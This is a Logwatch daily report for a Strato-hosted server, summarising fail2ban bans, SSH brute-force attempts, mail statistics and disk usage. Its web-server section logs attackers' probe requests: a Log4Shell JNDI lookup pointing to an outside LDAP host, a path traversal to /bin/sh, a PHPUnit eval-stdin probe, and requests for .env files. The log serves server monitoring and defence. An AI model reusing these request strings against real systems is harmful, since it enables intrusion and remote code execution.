################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Sat Jan 1 04:42:04 2022
Date Range Processed: yesterday
( 2021-Dec-31 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host:
h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 53:53 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
Connection attempts using mod_proxy:
54.183.214.154 -> zapf.wiki:443: 1 Time(s)
92.118.234.202 -> zapf.wiki:443: 7 Time(s)
A total of 10 sites probed the server
159.223.48.169
165.227.221.200
178.62.78.53
185.107.195.5
188.166.181.21
195.133.40.56
34.96.130.19
45.134.144.108
46.101.18.159
54.234.218.242
Requests with error response codes
400 Bad Request
null: 23 Time(s)
zapf.wiki:443: 8 Time(s)
mstshash=Domain: 4 Time(s)
/phpmyadmin/scripts/setup.php: 3 Time(s)
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 2 Time(s)
/: 1 Time(s)
/.env: 1 Time(s)
/ab2g: 1 Time(s)
/ab2h: 1 Time(s)
HTTP/1.0: 1 Time(s)
404 Not Found
//2019/wp-includes/wlwmanifest.xml: 2 Time(s)
//2020/wp-includes/wlwmanifest.xml: 2 Time(s)
//blog/wp-includes/wlwmanifest.xml: 2 Time(s)
//cms/wp-includes/wlwmanifest.xml: 2 Time(s)
//news/wp-includes/wlwmanifest.xml: 2 Time(s)
//shop/wp-includes/wlwmanifest.xml: 2 Time(s)
//site/wp-includes/wlwmanifest.xml: 2 Time(s)
//sito/wp-includes/wlwmanifest.xml: 2 Time(s)
//test/wp-includes/wlwmanifest.xml: 2 Time(s)
//web/wp-includes/wlwmanifest.xml: 2 Time(s)
//website/wp-includes/wlwmanifest.xml: 2 Time(s)
//wordpress/wp-includes/wlwmanifest.xml: 2 Time(s)
//wp-includes/wlwmanifest.xml: 2 Time(s)
//wp/wp-includes/wlwmanifest.xml: 2 Time(s)
//wp1/wp-includes/wlwmanifest.xml: 2 Time(s)
//wp2/wp-includes/wlwmanifest.xml: 2 Time(s)
//xmlrpc.php?rsd: 2 Time(s)
500 Internal Server Error
/: 40 Time(s)
/robots.txt: 3 Time(s)
/.env: 2 Time(s)
/ecp/Current/exporttool/microsoft.exchange ... ool.application: 2 Time(s)
/.git/HEAD: 1 Time(s)
///remote/fgt_lang?lang=/../../../..//////////dev/: 1 Time(s)
/?XDEBUG_SESSION_START=phpstorm: 1 Time(s)
/?x=${jndi:ldap://195.54.160.149:12344/Bas ... I6NDQzKXxiYXNo}: 1 Time(s)
/_ignition/execute-solution: 1 Time(s)
/actuator/health: 1 Time(s)
/login.cs: 1 Time(s)
/mifs/.;/services/LogService: 1 Time(s)
/owa/: 1 Time(s)
/owa/auth/logon.aspx: 1 Time(s)
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
/owa/auth/x.js: 1 Time(s)
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
root (67.205.162.21): 33 Time(s)
root (118.89.162.250): 32 Time(s)
root (178.154.196.230): 32 Time(s)
root (42.193.184.210): 32 Time(s)
root (106.12.194.13): 31 Time(s)
root (81.68.93.27): 31 Time(s)
root (1.116.25.72): 29 Time(s)
unknown (139.59.44.143): 24 Time(s)
root (146.56.192.231): 23 Time(s)
root (180.250.248.170): 22 Time(s)
root (203.205.37.224): 20 Time(s)
root (202.112.61.110): 19 Time(s)
unknown (106.12.194.13): 19 Time(s)
unknown (202.21.123.198): 19 Time(s)
unknown (1.116.25.72): 18 Time(s)
unknown (118.89.162.250): 18 Time(s)
unknown (42.193.184.210): 18 Time(s)
unknown (178.154.196.230): 17 Time(s)
unknown (67.205.162.21): 17 Time(s)
unknown (81.68.93.27): 16 Time(s)
root (185.74.4.189): 15 Time(s)
root (217.117.14.248): 15 Time(s)
unknown (146.56.192.231): 15 Time(s)
unknown (185.74.4.189): 10 Time(s)
unknown (144.126.208.202): 9 Time(s)
root (118.195.145.14): 8 Time(s)
unknown (202.112.61.110): 8 Time(s)
unknown (203.205.37.224): 8 Time(s)
root (62.209.63.32): 7 Time(s)
unknown (180.250.248.170): 7 Time(s)
root (104.244.73.93): 6 Time(s)
root (
monero.mnpnk.com): 6 Time(s)
unknown (217.117.14.248): 5 Time(s)
root (139.59.44.143): 4 Time(s)
root (14.143.137.18): 4 Time(s)
root (134.17.16.92): 3 Time(s)
root (162.243.20.232): 3 Time(s)
unknown (118.195.145.14): 3 Time(s)
unknown (162.243.20.232): 3 Time(s)
root (202.21.123.198): 2 Time(s)
unknown (134.17.16.92): 2 Time(s)
unknown (199.195.253.100): 2 Time(s)
unknown (209.141.44.198): 2 Time(s)
unknown (modemcable254.188-200-24.mc.videotron.ca): 2 Time(s)
postgres (81.68.93.27): 1 Time(s)
root (120.230.104.74): 1 Time(s)
root (178.128.216.205): 1 Time(s)
root (tor-exit.a9.wtf): 1 Time(s)
root (
tor-project-exit1.dotsrc.org): 1 Time(s)
unknown (14.143.137.18): 1 Time(s)
unknown (178.213.248.102): 1 Time(s)
unknown (203.128.242.166): 1 Time(s)
Invalid Users:
Unknown Account: 245 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
9.722K Bytes accepted 9,955
9.722K Bytes sent via SMTP 9,955
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
1 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
1 Total 4xx Rejects 100.00%
======== ==================================================
196 Connections
7 Connections lost (inbound)
196 Disconnections
1 Removed from queue
1 Sent via SMTP
1 Hostname verification errors (FCRDNS)
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin
------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End
-------------------------
--------------------- SSHD Begin ------------------------
Disconnecting after too many authentication failures for user:
root : 2 Time(s)
Failed logins from:
1.116.25.72: 29 times
14.143.137.18 (14.143.137.18.static-pune.vsnl.net.in): 4 times
42.193.184.210: 32 times
62.209.63.32: 7 times
67.205.162.21: 33 times
81.68.93.27: 32 times
104.244.73.93 (LuxembourgTor3): 6 times
104.244.74.28 (tor-exit.a9.wtf): 5 times
106.12.194.13: 31 times
118.89.162.250: 32 times
118.195.145.14: 8 times
120.230.104.74: 1 time
134.17.16.92 (92-16-17-134-cloud.mts.by): 3 times
139.59.44.143: 4 times
146.56.192.231: 23 times
162.243.20.232: 3 times
178.128.216.205: 1 time
178.154.196.230: 32 times
180.250.248.170: 22 times
185.74.4.189: 15 times
185.129.61.1 (
tor-project-exit1.dotsrc.org): 4 times
202.21.123.198: 2 times
202.112.61.110: 19 times
203.205.37.224 (static.cmcti.vn): 20 times
209.141.34.232 (
monero.mnpnk.com): 6 times
217.117.14.248: 15 times
Illegal users from:
2001:470:1:332::2 (
the-shadow-server-foundation.e0-1.core1.sfo2.he.net): 1 time
undef: 187 times
1.116.25.72: 18 times
14.143.137.18 (14.143.137.18.static-pune.vsnl.net.in): 1 time
24.200.188.254 (modemcable254.188-200-24.mc.videotron.ca): 2 times
42.193.184.210: 18 times
45.88.137.100: 1 time
65.49.20.69 (
scan-20.shadowserver.org): 1 time
67.205.162.21: 17 times
81.68.93.27: 16 times
106.12.194.13: 19 times
118.89.162.250: 18 times
118.195.145.14: 3 times
134.17.16.92 (92-16-17-134-cloud.mts.by): 2 times
139.59.44.143: 24 times
144.126.208.202: 9 times
146.56.192.231: 15 times
162.243.20.232: 3 times
178.73.215.171 (
178-73-215-171-static.glesys.net): 1 time
178.154.196.230: 17 times
178.213.248.102: 1 time
180.250.248.170: 7 times
185.74.4.189: 10 times
199.195.253.100: 2 times
202.21.123.198: 19 times
202.112.61.110: 8 times
203.128.242.166: 1 time
203.205.37.224 (static.cmcti.vn): 8 times
209.141.44.198: 2 times
217.117.14.248: 5 times
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33257p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################